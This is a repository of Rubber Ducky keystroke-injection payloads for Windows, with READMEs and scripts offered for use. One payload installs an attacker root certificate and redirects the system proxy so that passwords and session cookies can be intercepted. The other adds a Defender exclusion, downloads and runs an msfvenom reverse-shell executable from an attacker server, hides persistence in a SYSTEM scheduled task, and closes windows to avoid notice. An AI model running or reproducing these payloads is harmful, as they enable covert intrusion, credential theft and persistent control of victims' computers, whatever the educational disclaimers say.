├── README.md
├── remote-proxy
    ├── README.md
    └── windows-remote-proxy-payload.txt
└── reverse-shell
    ├── README.md
    └── windows-reverse-shell-payload.txt


/README.md:
--------------------------------------------------------------------------------
 1 | # README
 2 | 
 3 | *This code does not promote or encourage any illegal activities. The content in this document is provided solely for
 4 | educational purposes and to create awareness.*
 5 | 
 6 | # Rubber Ducky Payload Repository
 7 | 
 8 | This repository contains a collection of payloads for the Rubber Ducky by created by DVBNL. Also the compiled *.bin files can be found in the specific payload folders.
 9 | 
10 | ## Repository Structure
11 | 
12 | This repository is organized by the type of payload. Each payload has its own directory which contains the payload script and a README file explaining what the payload does and how to use it.
13 | 
14 | ## How to Use
15 | 
16 | To use a payload, follow these steps:
17 | 
18 | 1. Navigate to the directory of the payload you want to use.
19 | 2. Read the README file for instructions on how to use the payload.
20 | 3. Load the payload onto your Rubber Ducky according to the instructions.
21 | 
22 | ## Contributing
23 | 
24 | Contributions are welcome! If you have a payload you'd like to add, please open a pull request.
25 | 
26 | ## Disclaimer
27 | 
28 | These payloads are provided for educational purposes only. DVBNL is not responsible for any damage caused by the misuse of these payloads.
29 | 


--------------------------------------------------------------------------------
/remote-proxy/README.md:
--------------------------------------------------------------------------------
 1 | # README
 2 | 
 3 | This code does not promote or encourage any illegal activities. The content in this document is provided solely for
 4 | educational purposes and to create awareness.
 5 | 
 6 | # Set remote/local proxy server
 7 | 
 8 | This script automates the setup of a remote proxy for Man-in-the-Middle (MITM) attacks on Windows systems. It has been tested on Windows 10 and Windows 11. The script performs the following tasks:
 9 | 
10 | 1. Starts Windows Terminal as an administrator.
11 | 2. Downloads and installs the Burp Suite CA certificate. (Or other proxy CA))
12 | 3. Configures the system proxy to use a specified remote proxy server.
13 | 4. Cleans up by terminating all active Windows Terminal and PowerShell processes.
14 | 
15 | Requirements:
16 | 
17 | - CA Root certificate for your proxy sever and remote webserver to download it
18 | - A remote or local forward proxy server like Burpsuite to intercept traffic
19 | 
20 | ## 1- ducky script and execute
21 | 
22 | When your proxy server is running and the CA can be downloaedd change the variables in the script:
23 | 
24 | - LINE 28 === Webserver
25 |   Change "http://yourwebserver/ca.der" to your own webserver where the certificate can be obtained.
26 | - LINE 48 === Proxyserver
27 |   Change "your.proxy.server:port" to your own remote of local IP-address where the proxy server is listening and add the tcp port.
28 | 
29 | When the payload executed you can remotely sniff unencrypted traffic and interceps passwords or session cookies to bypass MFA.
30 | 


--------------------------------------------------------------------------------
/reverse-shell/README.md:
--------------------------------------------------------------------------------
 1 | # README
 2 | 
 3 | This code does not promote or encourage any illegal activities. The content in this document is provided solely for
 4 | educational purposes and to create awareness.
 5 | 
 6 | # Staged TCP Reverse Shell with Rubber Ducky script within Windows Terminal
 7 | 
 8 | Since Microsoft pushed the latest 22H2 up-date for Windows 11 all Powershell reverse shell payloads have stopped working. Microsoft made changes to the way commandline tools are being opened. Everything will be opened in the new "Windows Terminal" and the "powershell -nop -noni -W hidden" commands are not working anymore.
 9 | 
10 | This Reverse Shell script is tested on the latest Windows version and is working properly.
11 | 
12 | Requirements:
13 | 
14 | - The executable itself - Step 1
15 | - HTTP server to host the shell executable - Step 2
16 | 
17 | ## 1 - craft malicious executable
18 | 
19 | I'm using a Staged Meterpreter TCP reverse shell executable. To craft one you can use "msfvenom" with the following command:
20 | 
21 | `msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP-LISTENER] LPORT=[PORT-LISTENER] -f exe > payload.exe`
22 | 
23 | Change the LHOST and LPORT to your own listener server.
24 | 
25 | ## 2- ducky script and execute
26 | 
27 | **Option 1: Simple Python Webserver**
28 | 
29 | Navigate to the directory containing shell.exe and run:
30 | 
31 | ```
32 | python3 -m http.server 8080
33 | ```
34 | 
35 | **Option 2: Docker + Apache Webserver**
36 | 
37 | Create a lightweight Apache container and map your executable folder:
38 | 
39 | ```
40 | docker create --name webserver \
41 |   -p 8080:80 \
42 |   -v [PATH-TO-FOLDER-WITH-EXECUTABLE]:/usr/local/apache2/htdocs:ro \
43 |   httpd:2.4-alpine
44 | ```
45 | 
46 | Then start the container:
47 | 
48 | ```
49 | docker start webserver
50 | ```
51 | 
52 | Now you can access the file at:
53 | 
54 | ```
55 | http://<server-ip>:8080/payload.exe
56 | ```
57 | 
58 | Next, change the variables in the script:
59 | 
60 | - LINE 25 === VARIABLES
61 |   Changing the paths is optional. I'm using C:\temp to create the folder and exclude it withint MS Defender. If you want a different path or executable name you can change them
62 | - LINE 36 === URL
63 |   This one is important because the target computers needs to download your crafted executable. Fill in the URL of your HTTP server and specify the folder/filename
64 | 


--------------------------------------------------------------------------------
/remote-proxy/windows-remote-proxy-payload.txt:
--------------------------------------------------------------------------------
 1 | REM       |=========================================================================|
 2 | REM         Remote Proxy for MITM attacks
 3 | REM         Author: DVBNL
 4 | REM         Version 1.0
 5 | REM         OS Tested: Windows 11, Windows 10
 6 | REM         Prerequisites are either a local proxy or remote proxy server (preferably with SSL/443)
 7 | REM       |=========================================================================|
 8 | 
 9 | ATTACKMODE HID
10 | 
11 | REM |===Start Windows Terminal as admin===|
12 | DELAY 2000
13 | GUI r
14 | DELAY 250
15 | STRING powershell "start-process wt -verb runas" 
16 | ENTER
17 | DELAY 2500
18 | LEFT
19 | ENTER
20 | DELAY 1500
21 | 
22 | REM |===Powershell Block to download the Burpsuite CA & install it===|
23 | STRING_POWERSHELL
24 |     $dir = "C:\temp";
25 |     $ca = "$dir\root-ca.der";
26 |     New-Item -Path $dir -ItemType Directory;
27 |     Invoke-Webrequest -Uri http://yourwebserver/ca.der -OutFile $ca;
28 |     $certdir = "$ca";
29 |     $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2;
30 |     $cert.Import($certdir);
31 |     $store = New-Object System.Security.Cryptography.X509Certificates.X509Store("Root", "LocalMachine");
32 |     $store.Open("ReadWrite");
33 |     $store.Add($cert);
34 |     $store.Close();
35 | END_STRING
36 | ENTER
37 | 
38 | REM |===Set system proxy to remote proxy server===|
39 | STRING_POWERSHELL
40 |     $proxy = "<proxyserverip>:<port>";
41 |     $bypass = "<local>";
42 |     $registryPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings";
43 |     $proxyServer = $proxy;
44 |     $proxyOverride = $bypass;
45 |     Set-ItemProperty -Path $registryPath -Name ProxyServer -Value $proxyServer;
46 |     Set-ItemProperty -Path $registryPath -Name ProxyOverride -Value $proxyOverride;
47 |     Set-ItemProperty -Path $registryPath -Name ProxyEnable -Value 1;
48 |     Set-ItemProperty -Path $registryPath -Name MigrateProxy -Value 1;
49 |     Set-ItemProperty -Path $registryPath -Name ProxyHttp1.1 -Value 1;
50 |     Set-ItemProperty -Path $registryPath -Name ProxyServer -Value $proxyServer;
51 |     Set-ItemProperty -Path $registryPath -Name ProxyOverride -Value $proxyOverride;
52 |     Set-ItemProperty -Path $registryPath -Name ProxyEnable -Value 1;
53 |     Set-ItemProperty -Path $registryPath -Name MigrateProxy -Value 1;
54 |     Set-ItemProperty -Path $registryPath -Name ProxyHttp1.1 -Value 1;
55 | END_STRING
56 | ENTER
57 | 
58 | REM |===Kill all active wt or powershell processes (Visibility)===|
59 | STRING Stop-Process -Name powershell, WindowsTerminal
60 | ENTER


--------------------------------------------------------------------------------
/reverse-shell/windows-reverse-shell-payload.txt:
--------------------------------------------------------------------------------
 1 | REM       |=========================================================================|
 2 | REM         Staged Interpreter TCP Reverse Ducky Shell
 3 | REM         Author: DVBNL
 4 | REM         Version 2.3
 5 | REM         OS Tested: Windows 11, Windows 10
 6 | REM         INTERPRETER STAGED REVERSE SHELL > executable
 7 | REM         WORKS WITH NEWEST WINDOWS TERMINAL (wt.exe)
 8 | REM       |=========================================================================|
 9 | 
10 | ATTACKMODE HID
11 | 
12 | REM |===Start Windows Terminal as admin===|
13 | DELAY 2000
14 | GUI r
15 | DELAY 250
16 | STRING powershell "start-process wt -verb runas" 
17 | ENTER
18 | DELAY 2500
19 | LEFT
20 | ENTER
21 | DELAY 1000
22 | 
23 | REM |===Powershell Block to create variables and add exclusions to Windows Defender===|
24 | STRING $dir = "C:\temp";
25 | ENTER
26 | STRING $shell = "$dir\shell.exe"; New-Item -Path $dir -ItemType Directory;
27 | ENTER
28 | STRING Add-MpPreference -ExclusionPath $dir;
29 | ENTER
30 | DELAY 250
31 | 
32 | REM |===Download shell executable from Webserver and RUN!===|
33 | STRING $desturl = "http://yourwebserver/payload.exe";
34 | ENTER
35 | STRING Invoke-WebRequest -Uri $desturl -OutFile $shell; Start-Process $shell;
36 | ENTER
37 | 
38 | REM |===Persistence with adding the executable as scheduled task===|
39 | STRING  $tn='sys updater'; $script=Join-Path $dir 'run.ps1'; if(-not (Test-Path $script)){Set-Content -Path $script -Encoding UTF8 -Value ' Invoke-WebRequest -Uri $desturl -OutFile $shell; Start-Process -FilePath "$shell" -WindowStyle Hidden'}; $ps="$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe"; $arg=('-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "{0}"' -f $script); $act=New-ScheduledTaskAction -Execute $ps -Argument $arg -WorkingDirectory $dir; $trg=New-ScheduledTaskTrigger -Daily -At 01:00; $trg.StartBoundary=(Get-Date -Hour 1 -Minute 0 -Second 0).AddDays(-1).ToString('s'); $trg.Repetition=New-CimInstance -Namespace root/Microsoft/Windows/TaskScheduler -ClassName MSFT_TaskRepetitionPattern -ClientOnly -Property @{Interval='PT5M';Duration='PT23H59M'}; $set=New-ScheduledTaskSettingsSet -StartWhenAvailable -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit (New-TimeSpan -Hours 24) -MultipleInstances Parallel; if(Get-ScheduledTask -TaskName $tn -ErrorAction SilentlyContinue){Unregister-ScheduledTask -TaskName $tn -Confirm:$false}; Register-ScheduledTask -TaskName $tn -Action $act -Trigger $trg -Settings $set -RunLevel Highest -User 'SYSTEM' 
40 | DELAY 250
41 | ENTER
42 | 
43 | REM |===Kill all active wt or powershell processes (Visibility)===|
44 | STRING Stop-Process -Name powershell, WindowsTerminal
45 | ENTER


--------------------------------------------------------------------------------